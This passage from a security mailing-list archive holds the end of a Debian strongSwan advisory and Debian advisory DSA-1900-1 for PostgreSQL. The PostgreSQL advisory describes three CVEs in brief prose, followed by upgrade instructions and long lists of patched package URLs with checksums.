http://security.debian.org/pool/updates/main/s/strongswan/strongswan_4.2.4-5+lenny3_ia64.deb Size/MD5 checksum: 1616200 0ce2671a1eaa92a58ffa749c08acbc83 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_4.2.4-5+lenny3_mips.deb Size/MD5 checksum: 1159422 3147d506d48de6277ac13d313ba8a4f7 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_4.2.4-5+lenny3_mipsel.deb Size/MD5 checksum: 1158848 1a4f6c94e451e86baa7cae2afecd037e powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_4.2.4-5+lenny3_powerpc.deb Size/MD5 checksum: 1229396 4c9c95a6f7e1449d788b1fc467643a56 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_4.2.4-5+lenny3_s390.deb Size/MD5 checksum: 1259906 78a3c024f40ccb2d2f2b82e30c978720 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/s/strongswan/strongswan_4.2.4-5+lenny3_sparc.deb Size/MD5 checksum: 1143570 0acb2853fafd6396147fdb019cadc412 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJKxkpjAAoJEL97/wQC1SS+6cAH/iN6t9E8KzYD5dhJIPtoXTEV i+C0Srsm92j376FctCShabeJbpBaKTNxclTYey9etR65M5DFJMYUvA1KglhDdJ+a 3GdEkdTSFU/foNX3bCfs9/+q2hGtvBbzNOLIYuevsrje7gid7uVIO2F9uHnTPd8X 9E13VbWJ9oDA9bEljTG1ilVMseWhe5tFtPT5zgpE+wVjojzM2mns63XUHCg/iCqT fyX+2Z15oYoV0UaaLQFlj/Q1D+G1jnp74qkrHVp3zZ/YF6kTSisAjH9jkriM7LjW 0T6U9erGwrdNQgbuzGn79f1y1uiJYc82WWzVBdzG/SmKlCrXIlPLdZAdIW2nSkQ= =5N4p -----END PGP SIGNATURE----- From fw at deneb.enyo.de Fri Oct 2 20:09:39 2009 From: fw at deneb.enyo.de (Florian Weimer) Date: Fri, 02 Oct 2009 19:09:39 +0000 Subject: [Full-disclosure] [SECURITY] [DSA 1900-1] New PostgreSQL packages fix various problems Message-ID: <874oqh1uks.fsf@mid.deneb.enyo.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1900-1 security at debian.org http://www.debian.org/security/ Florian Weimer October 02, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : postgresql-7.4, postgresql-8.1, postgresql-8.3, postgresql-8.4 Vulnerability : several Problem type : remote Debian-specific: no CVE Id(s) : CVE-2009-3229 CVE-2009-3230 CVE-2009-3231 Several vulnerabilities have been discovered in PostgreSQL, an SQL database system. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-3229 Authenticated users can shut down the backend server by re-LOAD-ing libraries in $libdir/plugins, if any libraries are present there. (The old stable distribution (etch) is not affected by this issue.) CVE-2009-3230 Authenticated non-superusers can gain database superuser privileges if they can create functions and tables due to incorrect execution of functions in functional indexes. CVE-2009-3231 If PostgreSQL is configured with LDAP authentication, and the LDAP configuration allows anonymous binds, it is possible for a user to authenticate themselves with an empty password. (The old stable distribution (etch) is not affected by this issue.) In addition, this update contains reliability improvements which do not target security issues. For the old stable distribution (etch), these problems have been fixed in version 7.4.26-0etch1 of the postgresql-7.4 source package, and version 8.1.18-0etch1 of the postgresql-8.1 source package. For the stable distribution (lenny), these problems have been fixed in version 8.3.8-0lenny1 of the postgresql-8.3 source package. For the unstable distribution (sid), these problems have been fixed in version 8.3.8-1 of the postgresql-8.3 source package, and version 8.4.1-1 of the postgresql-8.4 source package. We recommend that you upgrade your PostgreSQL packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.26-0etch1.dsc Size/MD5 checksum: 1134 0c5ec3d8c4af34cf555a3206ac8410f9 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0etch1.diff.gz Size/MD5 checksum: 40114 e1aa8128f80b1437f296c6e0a0772c9c http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.26-0etch1.diff.gz Size/MD5 checksum: 36185 adb9c4e73892f87981641ce2649c04f4 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0etch1.dsc Size/MD5 checksum: 1179 5c24c7277756756a8da4756523032bca http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.18.orig.tar.gz Size/MD5 checksum: 11515037 34911f0a3e8ef5d1bd46f67cf96692fb http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.26.orig.tar.gz Size/MD5 checksum: 10052172 fd007d094fdc8ac0ea850c7a38ae1c21 Architecture independent packages: http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-server-dev-7.4_7.4.26-0etch1_all.deb Size/MD5 checksum: 530802 2883dbdc70ad88eaebc064af9ba2f5d9 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-doc-8.1_8.1.18-0etch1_all.deb Size/MD5 checksum: 1514890 bf0d556c38afc0c87da2ac16579be0a8 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-doc-7.4_7.4.26-0etch1_all.deb Size/MD5 checksum: 1190930 b19cd49dca6d612da83a2e734c54ba66 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.26-0etch1_alpha.deb Size/MD5 checksum: 641986 ea28011b561feb0c9538a4f1339d968e http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.26-0etch1_alpha.deb Size/MD5 checksum: 129692 6bd567dc8fbb10e5468556909b2b2969 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.18-0etch1_alpha.deb Size/MD5 checksum: 304662 40fb809d990925087642326ba8464ff8 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0etch1_alpha.deb Size/MD5 checksum: 4505554 811fd44ebba518563bb216f82dac703e http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.18-0etch1_alpha.deb Size/MD5 checksum: 393434 3a5d80a781f4581fa5875576ad5b0f22 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.18-0etch1_alpha.deb Size/MD5 checksum: 198580 39acf52627f293699f61616e254939ea http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.18-0etch1_alpha.deb Size/MD5 checksum: 211260 036c6f2f27942238e22a43f2176e7bd0 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.18-0etch1_alpha.deb Size/MD5 checksum: 188474 3d49b1b9305b5fe5e0f01adeec234ca5 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.18-0etch1_alpha.deb Size/MD5 checksum: 205186 e6379ede607185457848b87c61ec8a57 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.18-0etch1_alpha.deb Size/MD5 checksum: 690404 ab7312df0861f348dd41406383f45c31 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.18-0etch1_alpha.deb Size/MD5 checksum: 406760 4d0cb024dee5028e8eb6c0fae199f7c4 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.26-0etch1_alpha.deb Size/MD5 checksum: 133050 e0da7f304a1687b2355a3a29b310e028 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.18-0etch1_alpha.deb Size/MD5 checksum: 213704 0d62cf6ce316cec16040c24432d2341c http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.26-0etch1_alpha.deb Size/MD5 checksum: 134216 4f0086f498a07bccf4e2d64819333723 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.18-0etch1_alpha.deb Size/MD5 checksum: 634048 3e2b3e6b33462c01d2678699b6ff3cf3 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.26-0etch1_alpha.deb Size/MD5 checksum: 1177518 5501a5be6ce3d65f635903e58bec6853 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.26-0etch1_alpha.deb Size/MD5 checksum: 3561802 4e159e8d42240dc1eed43cc38c45dc1f http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.18-0etch1_alpha.deb Size/MD5 checksum: 199022 8ad1a920e4c0b8368224248dda98bd1f http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.18-0etch1_alpha.deb Size/MD5 checksum: 1521744 46b55ea9529d77a2705414337fe0f7ee amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.26-0etch1_amd64.deb Size/MD5 checksum: 596070 eac98d68065c1fe659b3cbc1afb9d66b http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.26-0etch1_amd64.deb Size/MD5 checksum: 133314 0597875e1985d719e2edbac090a37ba7 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.18-0etch1_amd64.deb Size/MD5 checksum: 1468054 bcc4f535b1fbccb42a3c863fd1adf8a0 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.18-0etch1_amd64.deb Size/MD5 checksum: 633430 c830f47a4b0e3707675eab338810e367 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.18-0etch1_amd64.deb Size/MD5 checksum: 197662 21953c2aa69db72c1e7dd3bb0f8222f2 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.18-0etch1_amd64.deb Size/MD5 checksum: 652612 5fd14b39d8511471ad7f5372585871d1 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.18-0etch1_amd64.deb Size/MD5 checksum: 207598 5fedd297aba7fdf7939fd17ba3b47b93 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.18-0etch1_amd64.deb Size/MD5 checksum: 299612 ed0cd7dac27f87ed50d0247f5ba9a435 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.26-0etch1_amd64.deb Size/MD5 checksum: 132392 c3930e591daa2e2599af35229da55c44 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.26-0etch1_amd64.deb Size/MD5 checksum: 1133654 58f55a0fab95dfaf96f360f68edf3671 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.18-0etch1_amd64.deb Size/MD5 checksum: 203378 6f8bd5f0076b4ac4ba5b211c10755d4c http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.26-0etch1_amd64.deb Size/MD5 checksum: 128806 d768e9dbc9ead8fa5ed4bd86789c0c1a http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.18-0etch1_amd64.deb Size/MD5 checksum: 361154 527ba8dc92d7a182592bd7f3618c9334 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.26-0etch1_amd64.deb Size/MD5 checksum: 3461632 2b6b50fd27932c22da0b791455fa2390 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.18-0etch1_amd64.deb Size/MD5 checksum: 208592 ce542e554a41395a1e90568144355e38 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.18-0etch1_amd64.deb Size/MD5 checksum: 197066 379803df9c76cac203cb1676082642cd http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.18-0etch1_amd64.deb Size/MD5 checksum: 379112 9657c4086da5f5b7c94d494d18c71569 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0etch1_amd64.deb Size/MD5 checksum: 4384228 53ebc3a75509b2ac075796a4d4467f21 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.18-0etch1_amd64.deb Size/MD5 checksum: 186920 4eaf45e3693e9f3beb72bd4a97818d19 arm architecture (ARM) http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.18-0etch1_arm.deb Size/MD5 checksum: 634006 9ca20548d790c08eba7041dbfe707e7b http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.18-0etch1_arm.deb Size/MD5 checksum: 288336 2ca03690c69ff469c98e260aad3921d7 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.26-0etch1_arm.deb Size/MD5 checksum: 132494 fe76a6cafdcf935110db49901f14ec69 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.18-0etch1_arm.deb Size/MD5 checksum: 197220 5c0b9f21f68183cc6b7abc1815fd92f9 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.18-0etch1_arm.deb Size/MD5 checksum: 186440 ed463b2f3839793d9120fb6d75f8ec80 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.18-0etch1_arm.deb Size/MD5 checksum: 204652 18266d1cc0c4f3e682807c1f33b084e8 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.26-0etch1_arm.deb Size/MD5 checksum: 127030 23324a8ad20d7567fedf43bde35ba53a http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.26-0etch1_arm.deb Size/MD5 checksum: 130282 f66abe04e49733ae071c0c976fb7d6d5 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.18-0etch1_arm.deb Size/MD5 checksum: 195908 8c8e9a0a12cae91a0e5565c447bc81cd http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.26-0etch1_arm.deb Size/MD5 checksum: 3406784 3c9c7ce483c5ccf98201aa799e46832d http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.18-0etch1_arm.deb Size/MD5 checksum: 622050 ec88699d5fd5d523f5ee860ac4730d64 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.18-0etch1_arm.deb Size/MD5 checksum: 366188 eefd15c53044bf0f9b5cf03027f48f58 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.26-0etch1_arm.deb Size/MD5 checksum: 1117686 b0e78ae33ffa5217fda999d3bccb15b7 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.18-0etch1_arm.deb Size/MD5 checksum: 200746 78501e0d15a1238767b609e0fb829405 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.18-0etch1_arm.deb Size/MD5 checksum: 345182 a1710cc2488e188da5c9b36b38ab19a0 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.26-0etch1_arm.deb Size/MD5 checksum: 582628 38d8ee0d516c1b2fd756bd524c826ac8 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0etch1_arm.deb Size/MD5 checksum: 4310142 4bd5b1754cd9b03a95ff8a526fc1d4ec http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.18-0etch1_arm.deb Size/MD5 checksum: 1435844 a0d8f342efaebcd63c8ec3bc0de300f8 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.18-0etch1_arm.deb Size/MD5 checksum: 208238 ee77d16a2f1047e42bc6451c8a7db855 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.18-0etch1_hppa.deb Size/MD5 checksum: 1508738 21b37da0085eae6895f1f43608605c49 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.26-0etch1_hppa.deb Size/MD5 checksum: 3885808 92e844f8816f4350bffc4e2f64d435a4 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.18-0etch1_hppa.deb Size/MD5 checksum: 301538 a55cfbae9376993542e7e1a7f75544fe http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.18-0etch1_hppa.deb Size/MD5 checksum: 366054 74720bbae5321ed1c3fb03b73bb3914d http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.18-0etch1_hppa.deb Size/MD5 checksum: 680792 eedc8851c14b68b8df75b844c5092d7b http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0etch1_hppa.deb Size/MD5 checksum: 4825394 9e17337d5183b9316dc78b6d52774e70 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.18-0etch1_hppa.deb Size/MD5 checksum: 199570 a3982d2c473c0923900c616f216094a8 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.18-0etch1_hppa.deb Size/MD5 checksum: 210286 be139e4b362c066d91af0551f1a20661 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.18-0etch1_hppa.deb Size/MD5 checksum: 214076 2de225a8289fb1aacb6b4b483bb04e5c http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.26-0etch1_hppa.deb Size/MD5 checksum: 129892 c38b7b07f56af10f0c88c31c5872adea http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.18-0etch1_hppa.deb Size/MD5 checksum: 205916 725ec67f55c98d6c28599ad0467d9dd5 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.26-0etch1_hppa.deb Size/MD5 checksum: 1167584 599b5175f0eadc42fec4cc5bec6bd02b http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.18-0etch1_hppa.deb Size/MD5 checksum: 388104 c6b2ec6d8f40c57571fc79f60a5525d3 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.18-0etch1_hppa.deb Size/MD5 checksum: 634462 497d81c185ca32294d418ca3646f02ce http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.26-0etch1_hppa.deb Size/MD5 checksum: 134684 1c09c23b5b387e1d131f89994c892061 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.26-0etch1_hppa.deb Size/MD5 checksum: 135126 bbca84fc3f76d77a0fee0db32f9fc3b0 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.18-0etch1_hppa.deb Size/MD5 checksum: 200028 38cdd4a8b411cd76a7eabd08c62c7d68 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.26-0etch1_hppa.deb Size/MD5 checksum: 637690 fafe918865b0e5dcc38ab3553d513949 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.18-0etch1_hppa.deb Size/MD5 checksum: 188450 80336942b488ddb4fe774278aafd2c57 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.26-0etch1_i386.deb Size/MD5 checksum: 130674 ab610dec6ac26203cd4057432787a6ac http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.26-0etch1_i386.deb Size/MD5 checksum: 1116108 69bb16cdf05accd6038ead7d50a426be http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.26-0etch1_i386.deb Size/MD5 checksum: 574334 316adbffeba9994a85d6e537174eae41 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.18-0etch1_i386.deb Size/MD5 checksum: 207092 16fa77ea07f45c2e1da786f0a6b3ee9d http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.18-0etch1_i386.deb Size/MD5 checksum: 196046 46196ec9b4b40922a0eabee9f65b1f5a http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.18-0etch1_i386.deb Size/MD5 checksum: 620694 b8afb34f7f2dd0b29ac257ae700b895d http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.18-0etch1_i386.deb Size/MD5 checksum: 208634 a98795dba4c5b148a7417cd5bfb4ba4b http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.26-0etch1_i386.deb Size/MD5 checksum: 128438 4800ca32275a63a496b7f7282d7de38f http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.18-0etch1_i386.deb Size/MD5 checksum: 295976 94252eb7cdc03e352a4cb72f4e13e2c3 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.18-0etch1_i386.deb Size/MD5 checksum: 632924 5c0776fcdfd2cb52cfddef10dd6bab4b http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0etch1_i386.deb Size/MD5 checksum: 4297716 1478f78bf5c1fa8e79a916773f37727a http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.18-0etch1_i386.deb Size/MD5 checksum: 355028 7af3c29e6c1af62671ff943a5cf0a0d7 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.18-0etch1_i386.deb Size/MD5 checksum: 203116 8c189c121c5dfc78ed72af9a35388199 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.18-0etch1_i386.deb Size/MD5 checksum: 374256 45fd4846f187b8fbdef5b207943645cc http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.18-0etch1_i386.deb Size/MD5 checksum: 186498 2a73520939bd5b786b6df222153533c0 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.26-0etch1_i386.deb Size/MD5 checksum: 132594 cbea14e452f4c28aa1a8fc83e6b83e93 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.18-0etch1_i386.deb Size/MD5 checksum: 197436 eaf2a4fb5f6987f20e4e8bf6da593eb7 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.18-0etch1_i386.deb Size/MD5 checksum: 1448484 1419b6ce2635e666dda08a97667fb3b9 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.26-0etch1_i386.deb Size/MD5 checksum: 3400038 68566e8d150c9672d2fc9f69721afc74 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.26-0etch1_ia64.deb Size/MD5 checksum: 1260622 2e366633dde66d8c0cd9f52bd14f05d9 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.26-0etch1_ia64.deb Size/MD5 checksum: 140522 70aae884e320054dd156594b3b9a3a1d http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.18-0etch1_ia64.deb Size/MD5 checksum: 793288 a6cc855342ac8acd34c8c5ccc0732cb8 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.18-0etch1_ia64.deb Size/MD5 checksum: 219140 18d225dd4493187809d2055a53b3614f http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.26-0etch1_ia64.deb Size/MD5 checksum: 3928116 5cd1c77d498ee0399ec1aead5a61f584 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.18-0etch1_ia64.deb Size/MD5 checksum: 225164 31ce670d4ebc721544f3f1ccf364037a http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.18-0etch1_ia64.deb Size/MD5 checksum: 214638 29029606fac83c911e2ce43159bc5871 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.18-0etch1_ia64.deb Size/MD5 checksum: 397434 40cb45830eacd79e0e549a7589016dca http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.18-0etch1_ia64.deb Size/MD5 checksum: 633316 558fa80919baae1afebe0d0d0eeec308 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.26-0etch1_ia64.deb Size/MD5 checksum: 140744 a336a4d95cb16405b8e9991851d83f49 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.18-0etch1_ia64.deb Size/MD5 checksum: 205638 d8b011d7595092aebc84e3ce101cfe30 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.18-0etch1_ia64.deb Size/MD5 checksum: 208220 ee023415db8b96c8628c114060f4faf3 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.26-0etch1_ia64.deb Size/MD5 checksum: 132784 28739b04cda7696278d3ed0ccced2f50 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.18-0etch1_ia64.deb Size/MD5 checksum: 190100 da4346d63a61fb1203a6a729bb513e8c http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0etch1_ia64.deb Size/MD5 checksum: 5120712 eaa77fe90e6af741d6bcb7b766dfb087 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.18-0etch1_ia64.deb Size/MD5 checksum: 428254 13839f3c0d5094558869d50283eb4b65 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.18-0etch1_ia64.deb Size/MD5 checksum: 324130 a67a94c6fc6234da119c51f483846d64 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.26-0etch1_ia64.deb Size/MD5 checksum: 720394 ee1e3cb0a34c9ba86e54e048ca800284 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.18-0etch1_ia64.deb Size/MD5 checksum: 1651584 4a347cc58d34a81bceb63667c276dcda mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.18-0etch1_mips.deb Size/MD5 checksum: 364874 e1fd5a6d186774bf4af0585ab0ceb0a6 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.18-0etch1_mips.deb Size/MD5 checksum: 633780 0a8a5a12ae50aee7b794a5100e367a71 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.26-0etch1_mips.deb Size/MD5 checksum: 133142 af6dbeb134d97221496f6643bfd87c31 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.18-0etch1_mips.deb Size/MD5 checksum: 1461566 d5d31be85816bb2d9e835cd0308db345 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.26-0etch1_mips.deb Size/MD5 checksum: 131776 5d7ca1bcdb12e45d1c6e0bc3f2525aea http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.26-0etch1_mips.deb Size/MD5 checksum: 3706890 0f79ba2d25bd7c942ef5e03be729b64e http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.18-0etch1_mips.deb Size/MD5 checksum: 635308 0c46032483e871e5af64336e3d297494 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.18-0etch1_mips.deb Size/MD5 checksum: 210648 48fa0cabb3bc75a611e37df01db443c7 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.18-0etch1_mips.deb Size/MD5 checksum: 196306 803339de7496b76d9a609b1e12162175 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.26-0etch1_mips.deb Size/MD5 checksum: 581040 4a8b3e3242fa95186c1dca6e33730878 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.26-0etch1_mips.deb Size/MD5 checksum: 1129170 b487f630b0ab69afc1c64b6e42941350 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.18-0etch1_mips.deb Size/MD5 checksum: 374014 62dea1309666ba57c5814043b93935a7 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.18-0etch1_mips.deb Size/MD5 checksum: 197454 d7d39ecfba266cd1e1cbf58f3e1c80a1 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.18-0etch1_mips.deb Size/MD5 checksum: 294772 5474109137db2f7813edd46dbc9d2dd7 